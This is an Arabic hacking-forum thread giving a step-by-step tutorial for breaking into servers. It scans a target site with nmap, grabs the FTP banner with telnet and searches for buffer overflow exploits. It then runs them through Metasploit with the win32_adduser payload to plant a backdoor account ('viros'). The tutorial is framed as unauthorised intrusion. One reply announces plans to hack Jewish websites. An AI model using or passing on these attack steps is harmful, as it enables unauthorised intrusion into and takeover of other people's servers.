|
شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت بسم الله الرحمن الرحيم السلام عليكم و رحمة الله و بركاته أقدم لكم شرح الاختراق المتقدم و هي طريقة الأختراق الأحترافيه طبعا الكثير منا واجه بعض المشاكل و هو أنه لما يفحص السيرفر و الموقع و ما يلقى ثغرات انكلود او كوماند..... و بعض الشباب بترك الموقع و يمل من البحث و ما يكون عنده علم بالطرق الثانيه و اللي منها طريقتنا اليوم و هي الأختراق عن طريق البرامج المركبه على السيرفر أو الموقع حاولت أسهل المسأله و اصغر الشرح بقدر المستطاع ول من لم يظهر له الشرح فليحمله من هنا : تحميل الشرح مع الصور بصيغة HTML اللي راح تتعلمه من الشرح:- 1-استخدام أداة Nmap الشهيره. 2-التعامل مع أداة M e t a s ploit. 3-استغلال ثغرات Buffer Overflow المكتوبه بلغة الميتا. متطلبات الشرح:- 1-أداة Nmap 2-أداة M e t a spliot لا أحد يطلب مني رابط التحميل للادوات أبحتوا عنها في مواقع البحت نبدأ الشرح على بركة الله http://www.vbspiders.com/imagesup/nmap1.jpg أمر البحث nmap -P0 http://www.site.com/ مع وضع رابط الموقع المراد اختراقه بدل http://www.site.com/ و زي ما نشوف البرامج المركبه على الموقع مع المنافذ الحين نروح للتلنت ((غير مهم جدا و لكن لزيادة فرصه نجاح الثغره)) ابدأ=>تشغيل=>telnet http://www.vbspiders.com/imagesup/nmap2.jpg نكتب أول شئ حرف o و انتر و بعدها نكتب الموقع و المنفذ مثل: site.com 21 21 منفذ الــFTP http://www.vbspiders.com/imagesup/nmap3.jpg هنا طلع لنا اسم البرنامج الحين نروح نبحث عن ثغرات للبرنامج عن طريق محرك البحث بهذه الطريقه FTP port 21 Buffer Overflow Exploit و ممكن تزود بالاخير و تحط كلمة M e t a بدون فراغات علشان أنا ما راح اشرح استغلال الثغرات هاذي الا اللي بالميتا بعد ما نلقى الثغره نحفظها بس مو باي اسم تبغاه شوفوا الصوره http://www.vbspiders.com/imagesup/nmap4.jpg هذا الأسم اللي تحفظ الثغره فيه و بامتداد pm تاخذ الثغره للمسار هذا C:\Program Files\M e t a sploit\Framework2\home\framework\exploits و تروح الأن و تفتح أداة الميتا بالذهاب للمكان اللي ثبت الاداة فيه راح تلقاها باسم msfconsole.exe http://www.vbspiders.com/imagesup/nmap5.jpg show exploits امر اظهار الثغرات الموجوده و راح تلاحظ الثغرات كثيره و هي طبعا ثغرات محفوظه مع البرنامج http://www.vbspiders.com/imagesup/nmap6.jpg http://www.vbspiders.com/imagesup/nmap7.jpg use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت) http://www.vbspiders.com/imagesup/nmap8.jpg show options أمر اظهار الخيارات RHOST = الموقع RPORT = المنفذ أهم شئ هو الموقع أما المنفذ ماهو لازم http://www.vbspiders.com/imagesup/nmap9.jpg set RHOST http://www.site.com/ امر اظافة الموقع و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ http://www.vbspiders.com/imagesup/nmap10.jpg show payloads أمر اظهار خيارات الثغره أو الأشياء اللي ممكن تنفذها الثغره و أهم شئ هو win32_adduser و هي لاضافة حساب رووت على السيرفر و هذا اللي راح اشرحه http://www.vbspiders.com/imagesup/nmap11.jpg set PAYLOAD win32_adduser أمر استخدام هذا الخيار للثغره الحين لو تبي تشوف الخيارات show option راح تلقى انضاف أمر الثغره لأضافة حساب الرووت لكن مكان اليوزر و الباس فاضي نضيف اليوزر و الباس بالأوامر هاذي set PASS viros اضافة الباسوورد viros set USER viros اضافة اليوزر viros http://www.vbspiders.com/imagesup/nmap12.jpg اظهار الخيارات و راح نشوف ان المعلومات انحفظت http://www.vbspiders.com/imagesup/nmap13.jpg exploit أمر الأستغلال و زي ما راح تشوفون ان فيه كلام راح يطلع زي اللي بالصوره و ان شاء الهل الثغره تظبط و بعد ما ينسجل حساب الرووت تروح تتصل بالسيرفر بأي برنامج اتصال زي برنامج putty سوف يتم شرحه باذن الله ======================== و الى هنا نكون وصلنا لنهاية الشرح أتمنى ان الشرح كان واضح و اذا فيه أي خطأ سامحوني عليه لان الأنسان غير معصوم من الخطأ و في الختام تقبلوا تحياتي bLuEhAcKeR دمتم في حفظ الرحمان |
مشكووووووور |
مشكككور واكتر من رائع الى الامام تقبل مروري |
شــرح ولا اروع اخوي الهكر الازرق جزاك الله خيرا |
بطل |
مشكوور كثير على شرح |
بارك الله فيك |
مشكور بطل |
شكرا يا قبو وياريت تحط شرح بالصور لتثبيت ال m e t a sploit على لينكس وشكرا مرة ثانيةبطل |
شكرا يا قبو وياريت تحط شرح بالصور لتثبيت ال m e t a sploit على لينكس وشكرا مرة ثانيةبطل |
شكراشكراشكراشكراشكراشكرالوول |
شكراشكراشكراشكراشكراوالله |
مشكور وماقصرت اخوي |
من الممكن تعمل شرح للـــ framework 3 و رح اكون مشكووور . |
رًٍٍَِوًٍَِعًًٍٍَِهًًٍَِِ يًٍَِآًٍَِبًًٍَِطلًًٍٍٍَََِ تًًٍَِِسًٍٍَِلًًٍٍَِمًًًٍََِ يًًٍَِمًٍََِِيًًٍٍَِنًٍََِكًًٍَِِ |
لو تحط الادوات احسن توفر علينا الجهد ولاخير في كاتم العلم + فيد الاعضاء بأشياء عندك ولاتعبهم وحنا داشين الموضوع نتعلم ونطلع محنا داشين علشان نبحث على ادوات وهي اصلا عندك برب |
يا اخي ما في مانع لو تعبت شوية في سبيل التعلم و مو كل شيئ سهل و لن تجد اي شيئ على طبق من دهب ابحت كما فعل الكثير سلام |
مشكككور واكتر من رائع الى الامام تقبل مروريشكرا |
تسلم يدك اخي شكراً جزيلاً لك |
من الممكن تعمل شرح metasploit framework 3 لاختراق الاجهزة و شكرا لك اخي bluehackerشكرا |
مشكورررررررررررررر |
مشكوووووور حبيبي وتحت التجربه |
السلام عليكم /*-/النصر لغزة مهما طال الزمان/*-/ السلام عليكم و رحمة الله و تعالى وبركاته و شعارنا :النصر لغزة مهما طال الزمانبالعلم بما يحدث في غزة قررت أنا و جماع من أصدقائى المساعدة وذلك عن طريق قرصة المواقع اليهودية .... كما أطلب من الله أن يكون في عون غزة أما بعد : بعدما قرأت موضوع القرصنة أعجبني و أردت السؤال : http://www.vbspiders.com/imagesup/nmap1.jpg ماذا أكتب في الدوس لتضهر لي هذه الصور ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ و جزاكم الله ألف خير و العافية لا تنســـــــــــــــــــــــــوا شعارنا : النصر لغزة مهما طال الزمان |
مشكوور كثير على شرح |
مشكور اخي على الشرح ...... |
مشكككور واكتر من رائع الى الامام تقبل مروري |
مشكووووووور مشكووووووور مشكووووووور |
شرح وافي شكرا |
الله عليك جرى التجربه ..... |
بارك الله فيك |
مشكووووور اخBlue Hacker على المجهود ..... الله يعطيك العافية |
مشكور يا اخي علي هدا الشراح جميل |
مشكوووووووور أخي العزيز |
يعطيك العافية حبيبي شايف هذا الشرح من قبل في عالم المعرفه تحياتي لك ... ! CONAN ! |
مشكووووووووور ماقصرت يالغالي |
يرجى ذكر حقوق النقل :18: |
والله كفو وكلمة قليله في حقك الله يعطيك العافيه الله يرضى على والديك قووووووول آمــــــــــــــين |
مشكوووووووووووور اخووووووووووووي :) |
مشكوور |
بارك الله فيك |
| الساعة الآن 04:28 PM |
[ vBspiders.Com Network ]